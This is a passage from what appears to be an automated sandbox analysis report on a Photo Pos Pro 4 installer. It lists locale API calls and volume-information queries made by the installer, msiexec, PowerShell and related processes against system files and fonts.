                  Source: C:\Windows\Installer\MSID82B.tmpCode function: EnumSystemLocalesW,8_2_00007FF71B790A04
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: GetLocaleInfoEx,8_2_00007FF71B7770DC
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: GetLocaleInfoW,8_2_00007FF71B797FFC
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: GetLocaleInfoW,8_2_00007FF71B790F50
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_00007FF71B797F48
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: GetLocaleInfoW,8_2_00007FF71B797DF0
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_00007FF71B798140
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: GetLocaleInfoEx,FormatMessageA,8_2_00007FF71B752884
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,8_2_00007FF71B7976D4
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeCode function: GetLocaleInfoA,lstrcpyA,__aulldiv,__aulldiv,__aulldiv,14_2_00420C4F
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeCode function: GetLocaleInfoA,lstrcpyA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatA,SetDlgItemTextA,lstrlenA,lstrlenA,lstrlenA,lstrcatA,SetDlgItemTextA,GetDlgItem,EnableWindow,14_2_0040DACF
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeCode function: LoadLibraryA,GetProcAddress,FreeLibrary,GetLocaleInfoA,lstrcpyA,FreeLibrary,14_2_004226A9
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\tar.exeQueries volume information: C:\Program Files (x86)\18.jpg VolumeInformationJump to behavior
                  Source: C:\Windows\System32\tar.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeQueries volume information: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\logo.png VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
